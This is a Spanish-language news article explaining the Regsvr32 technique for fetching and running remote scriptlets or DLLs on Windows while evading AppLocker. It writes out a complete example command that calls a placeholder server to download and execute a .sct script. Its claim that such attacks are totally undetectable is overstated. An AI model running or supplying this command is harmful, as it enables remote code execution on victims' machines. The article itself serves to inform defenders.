Recientemente, un investigador de
seguridad ha descubierto una vulnerabilidad en una herramienta de línea de
comandos de Windows, Regsvr32, la cual puede permitir la descarga y ejecución
de librerías y scripts de forma remota evadiendo todos los demás controles de
seguridad.
Regsvr32 es una utilidad muy utilizada en instaladores o en series de comandos por lotes para registrar rápida y fácilmente librerías DLL en el sistema, sin embargo, esta herramienta no aporta ningún tipo de control ni está correctamente documentada ni limitada, lo que ha abierto la puerta a una serie de ataques informáticos en los que un atacante registra en el sistema librerías DLL desde fuentes externas (por ejemplo, desde una URL), e incluso scripts, con el fin de comprometer el sistema.
Un
ejemplo de uso malintencionado de esta herramienta sería ejecutando:
regsvr32 /s /n /u
/i:http://server/file.sct scrobj.dll
Como hemos dicho, el primer problema
que tiene esta herramienta es que no está correctamente documentada, por lo que
nadie sabe muy bien cómo funciona ni cómo utilizarla de forma segura. Además,
una incorrecta delimitación permite que se carguen scripts en JavaScript o
VisualBasic desde el propio bloque de comandos en lote, así como tener acceso
total a Internet tanto por HTTP como desde el proxy del sistema y es compatible
con el tráfico cifrado TLS, por lo que un atacante puede alojar en un servidor
remoto la librería maliciosa o el script y descargarlo en el sistema de forma
totalmente oculta.
Por todo ello, los piratas informáticos pueden instalar de forma remota librerías en el sistema, las cuales puedan explotar para tomar el control del sistema con privilegios totales sobre el mismo, todo ello sin necesidad de tener permisos de administrador en el equipo.
Vulnerabilidad
regsvr32
- Estos ataques
informáticos son imposibles de detectar y ni Windows ni AppLocker pueden
bloquearlos
- Tal como
aseguran los expertos de seguridad, estos ataques son totalmente
imposibles de detectar ya que, en teoría, es una función legítima y propia
de Windows. Además, el atacante no necesita permisos de administrador para
hacer uso de ella y, como hemos dicho, es capaz de ocultar su tráfico tras
un proxy legítimo y usar tráfico cifrado para comunicarse con el servidor,
aumentando así su peligrosidad.
- Los usuarios que
quieran analizar el funcionamiento de esta vulnerabilidad, pueden
descargar la prueba de concepto desde GitHub.
- Microsoft es
consciente de esta vulnerabilidad y, probablemente, en alguno de los
próximos boletines de seguridad de la compañía veamos una revisión de la
misma que dota a los administradores de un mayor control sobre las
librerías que se pueden o no se pueden importar al sistema, sin embargo, a
día de hoy, sigue siendo una vulnerabilidad abierta y, lo peor de todo,
conocida, por lo que debemos tener cuidado a la hora de instalar programas
y ejecutar scripts en nuestro sistema Windows.
